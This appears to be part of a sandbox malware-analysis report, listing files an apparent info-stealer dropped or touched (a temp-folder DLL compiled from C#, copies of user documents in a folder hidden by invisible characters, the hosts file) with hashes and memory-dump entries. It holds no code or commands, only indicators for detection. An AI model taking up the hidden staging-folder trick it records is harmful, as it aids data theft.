C:\Users\Admin\AppData\Local\Temp\luxn1d31\luxn1d31.dll

Filesize
4KB

MD5
d05b752852eb97d72dbb3a3f640c1514

SHA1
a7ce15922011a15fd9c07f60825f51a6e7f93430

SHA256
083093e52435a6b46893840ed91b19a5c916814fb7c89c7172280ccfe0176250

SHA512
d04b4c7f560b7093af500171b1482eaaac5d63ce0b5fa49e89defd6ce1a6ccb37e34f22500f8488a452296b85eae6e69d35ed838b918d43d1945f4d800a70fa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Desktop\CompareBackup.ods

Filesize
613KB

MD5
253871c3af80c6d52634bf8cf4a3f80a

SHA1
f3c1cdb9356b7f027e2886ded22176b268cd89cd

SHA256
8d57f7ed934e42fe0afc5800124dea36aba1dcc435e0cd4dcfa9e39185fb5f4c

SHA512
36a74c613f6480bf635077ef33fc5d3f0aa146289add812e8d779311bf25c8a8e6b48c0a7137e8c134331c9950ccd4c1ce2b0e57b5c7e9f689235aba8d50f945

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Desktop\LimitExpand.docx

Filesize
18KB

MD5
42048e4dfbf31feb57a58b0f1e4b7cd6

SHA1
14817de858fa4eabbaebb0aa774fda4790966514

SHA256
49bf4fd54e6c71d2b6ea19a98cd6e63b5a4fe2643f83ac3fe013783988c0b060

SHA512
4f50df4c7bc19d022812bc6e693643f84d91263af24b7a5d0870b5abc081ee549d8d1b5eb1ab0703e62c83b2b646fb3a6a0352ee1286f67b30afb0b30e50a476

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Desktop\PingAdd.docx

Filesize
16KB

MD5
329b35ede5c9e35b14976ae0ef6bb6a3

SHA1
c1c591da50b91a86e46666309493fe73c2f2df97

SHA256
002b42a2f14af656c6330bcc305ecb56e8ea1d2d7f121d0f78a88bbad8c6f6ef

SHA512
c6b4a60be5618d87e98ab53ef7585e925581a791f9ee6da7a6e63b55e666e75d9c0d2fafd661cf92408ce9dbb03972a1129cd9497e468c9f664807dac1f32989

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Desktop\RevokeBackup.wmf

Filesize
659KB

MD5
32bb9a3c7294d3d519468d418db7e3fa

SHA1
bce3c3248608af2b34e64a4565001a493242d828

SHA256
b012a62190a8d6c923393f615c0b0b516372d947035ad9f15b61a025d057ce32

SHA512
246fd04f61c103ea02bd8a892a995c2ed588f9dbf3369f7d1633d83cb97c2f9467667e4d85c8cbe1d38fa7c53e8e8728c8137f6405f8beede7cd6a694325abea

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Desktop\ShowBackup.wav

Filesize
566KB

MD5
a757d8db782c79c3410b077d69ff7dea

SHA1
1c594fc54f68975e180e321b8ce7fa7606112bfd

SHA256
586cdbeda99539081186e546e928e2b91106fbcf72532643e8aa6eca6e66dc54

SHA512
4784c13e6a2d49b9d823d026bc7bd906856cfc6c9992afa121e72fbba1ca450366a34e745e96a942f878095f95ca676aa210384613ab6bce07b724d735d60536

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\DismountPush.pdf

Filesize
940KB

MD5
bfa6002329846890f542326c778d04b9

SHA1
71f00165ade124c7712e9bf1dddb78ef219c3d69

SHA256
9f95ea186699c1f9228c256fba77c89405132f33ce9ffad6119903f0d1dadc2b

SHA512
125851ab2ccaecf8e07fcb51c9be7c5eebe935bd20e1958c1d60a15ab6a6de10c21c3953c2f9a4deaa1eaa1fc9111f7fb28f7bb6973af1c1a767bdca25b36356

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\DismountSend.doc

Filesize
846KB

MD5
987ab1ea0e734bd6213c2463e0241831

SHA1
89b0010fa795dbd0a6f5d71fa5708110f9ea3cd6

SHA256
8b0a747358aa6f0f57fe2cd72373f22888abced14ba76805af71e23f64b5cd60

SHA512
d984fe8ae4ae0f85c8544937a7bee91aff0c81e22bb07cc63ff7c6988bada1af1e63936494aa1172bb54f320f7ac4f71e70a61c9336da75646f742a26d6bba8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\JoinCopy.txt

Filesize
893KB

MD5
59110890bd6b02d8ecdfc829b360d8d9

SHA1
632ed0a28483ce4bdc93e07081e1a969b5f896d8

SHA256
f167f0ff52be5363f038288f4f74b29bb637a4a90d56d66eceb2e0fd519e5c71

SHA512
8576abb509d1d7a2feeced196df3917b529c3f530c3fb7d5323366cd35edb7a9c2ab4d98a5db7b94c0d9b2490ca102ad80e772487d7a9339a3dc007752947897

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\LimitComplete.docx

Filesize
17KB

MD5
aaf4ca571fb30a8d808752164568cdb4

SHA1
92e25d0ccdee8738b42d47317e61d8d39b6988cb

SHA256
9276c7a2c47e1ef2ea778b2493eb21c57cdeadb09747da46e9897efdd51ccc41

SHA512
9d7e38de7f28cbbfcc7bda7ae411030f14cafe244e7174e5ca10109ba559aa3260b893356eda814315fe67b6ae090f8a0d7fe2080ab138321094a9dd9ad949f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\PublishGrant.pdf

Filesize
611KB

MD5
e25456b9f4f858483536be4aca022707

SHA1
c0c38c93e9fd58e77fff8717e50060c3e7fee2ba

SHA256
daa058e514f47bafd7e076649e6b63457e812a3595c8333e8b456ce2547f7562

SHA512
e84c22ce59a7c16b7ad931bd97074bd1a704c44b3826964b84c214a8aa34a6c8beb3422ffbd1d09928f1c18af4fabb99f61ae3628ef3549f98e38b9427ba9265

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\PublishNew.doc

Filesize
869KB

MD5
65636c14837a0ecab39fe202ed4a3203

SHA1
d69b50aaa0b8b0db4f65b101c588ce17c8e4f58b

SHA256
96abfca245fcb1d8e5955cac8bf721f539c5529cfb077686dd4de1db8019995e

SHA512
a4420e99f406e5a225eee32e262cb41eeebf902ae3999e7b96608203d24e33907aaaaa1b4ae50ee5bc899f9f815be6e27fd18f5e7a92a6532f75def72cefd60e

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌   \Common Files\Documents\RepairRename.doc

Filesize
1.3MB

MD5
4147ff6b222e460f9e765aaf4e1392cd

SHA1
7c225a618a8680b064e88ab314600a87a6795b48

SHA256
fad418e4fab6d2f04d187c5b94082a28d85a266d983b8ae94a0d765f7bd16c52

SHA512
b8b11d22e0c17f64f8f43f0d6125fa53a0c6ae5b1fd885bad4b945d9871141b1705f5fb6c0020330ff8c350148ff26257560c8f05f0c838be20adf229f3622a9

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\luxn1d31\CSC6853C7381330446C9CABB3A3B9EF8E33.TMP

Filesize
652B

MD5
15c831369cdde1647ba270653c7074cb

SHA1
00bba6a09449ead075c3fee91e4eef56b6e84996

SHA256
5854c27ddcb12dd3d5010a2be6bb32d33bdb9c6c5a44edcc23275a7432f30dcb

SHA512
3d216b9cb6a4cae7fd197fe698812569acc2d81f15cca81c51ff29643f7e41774bd0e9b63f1e144bbba5aee8cdf706bd16dcdc01a094e0605236c932db43faab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\luxn1d31\luxn1d31.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\luxn1d31\luxn1d31.cmdline

Filesize
607B

MD5
ec3fe2256f92e8a24c6992abd3654bbd

SHA1
a2bbef591604c8533275910cc126499661ff1160

SHA256
47bf78bd5de70b6b20dc2fd7b7fc5112b0267c5ac25630012d6d4afa01057fd7

SHA512
677f0cf7decba0cddfc9d636ba409e0ea49694b3725b735b8bc6a2dd8fd6ca360f07c75b9207ace4cb87e3dbac8af4b058d474c0e699b2aabea85670a7de3257

Download Submit
memory/1984-82-0x00007FFE6CD63000-0x00007FFE6CD65000-memory.dmp

Filesize
8KB

Download
memory/1984-94-0x00007FFE6CD60000-0x00007FFE6D821000-memory.dmp

Filesize
10.8MB

Download
memory/1984-105-0x00007FFE6CD60000-0x00007FFE6D821000-memory.dmp

Filesize
10.8MB

Download
memory/1984-111-0x00007FFE6CD60000-0x00007FFE6D821000-memory.dmp

Filesize
10.8MB

Download
memory/1984-89-0x000001DFE5E60000-0x000001DFE5E82000-memory.dmp

Filesize
136KB

Download
memory/2908-215-0x000002016DD70000-0x000002016DD78000-memory.dmp

Filesize
32KB

Download
memory/3988-286-0x00007FFE6D830000-0x00007FFE6D948000-memory.dmp

Filesize
1.1MB

Download
memory/3988-74-0x00007FFE816F0000-0x00007FFE81714000-memory.dmp

Filesize
144KB

Download
memory/3988-199-0x00007FFE6DB10000-0x00007FFE6DE87000-memory.dmp

Filesize
3.5MB

Download
memory/3988-72-0x0000024512C30000-0x0000024512FA7000-memory.dmp

Filesize
3.5MB

Download
memory/3988-126-0x0000024512C30000-0x0000024512FA7000-memory.dmp

Filesize
3.5MB

Download
memory/3988-95-0x00007FFE7D8A0000-0x00007FFE7D8B9000-memory.dmp

Filesize
100KB

Download
memory/3988-81-0x00007FFE82970000-0x00007FFE8298E000-memory.dmp

Filesize
120KB

Download
memory/3988-112-0x00007FFE7D870000-0x00007FFE7D89E000-memory.dmp

Filesize
184KB

Download
memory/3988-71-0x00007FFE7CA40000-0x00007FFE7CAF7000-memory.dmp

Filesize
732KB

Download
memory/3988-32-0x00007FFE85890000-0x00007FFE8589F000-memory.dmp

Filesize
60KB

Download
memory/3988-83-0x00007FFE7D5C0000-0x00007FFE7D731000-memory.dmp

Filesize
1.4MB

Download
memory/3988-30-0x00007FFE816F0000-0x00007FFE81714000-memory.dmp

Filesize
144KB

Download
memory/3988-24-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp

Filesize
4.4MB

Download
memory/3988-70-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp

Filesize
4.4MB

Download
memory/3988-77-0x00007FFE7D850000-0x00007FFE7D865000-memory.dmp

Filesize
84KB

Download
memory/3988-80-0x00007FFE6D830000-0x00007FFE6D948000-memory.dmp

Filesize
1.1MB

Download
memory/3988-78-0x00007FFE7D840000-0x00007FFE7D84D000-memory.dmp

Filesize
52KB

Download
memory/3988-125-0x00007FFE7CA40000-0x00007FFE7CAF7000-memory.dmp

Filesize
732KB

Download
memory/3988-73-0x00007FFE6DB10000-0x00007FFE6DE87000-memory.dmp

Filesize
3.5MB

Download
memory/3988-66-0x00007FFE7D870000-0x00007FFE7D89E000-memory.dmp

Filesize
184KB

Download
memory/3988-64-0x00007FFE81730000-0x00007FFE8173D000-memory.dmp

Filesize
52KB

Download
memory/3988-300-0x00007FFE82970000-0x00007FFE8298E000-memory.dmp

Filesize
120KB

Download
memory/3988-295-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp

Filesize
4.4MB

Download
memory/3988-305-0x00007FFE7CA40000-0x00007FFE7CAF7000-memory.dmp

Filesize
732KB

Download
memory/3988-304-0x00007FFE7D870000-0x00007FFE7D89E000-memory.dmp

Filesize
184KB

Download
memory/3988-301-0x00007FFE7D5C0000-0x00007FFE7D731000-memory.dmp

Filesize
1.4MB

Download
memory/3988-296-0x00007FFE816F0000-0x00007FFE81714000-memory.dmp

Filesize
144KB

Download
memory/3988-62-0x00007FFE7D8A0000-0x00007FFE7D8B9000-memory.dmp

Filesize
100KB

Download
memory/3988-60-0x00007FFE7D5C0000-0x00007FFE7D731000-memory.dmp

Filesize
1.4MB

Download
memory/3988-58-0x00007FFE82970000-0x00007FFE8298E000-memory.dmp

Filesize
120KB

Download
memory/3988-56-0x00007FFE83E90000-0x00007FFE83EA8000-memory.dmp

Filesize
96KB

Download
memory/3988-54-0x00007FFE7D8C0000-0x00007FFE7D8EC000-memory.dmp

Filesize
176KB

Download
memory/3988-336-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp

Filesize
4.4MB

Download
memory/3988-351-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp

Filesize
4.4MB

Download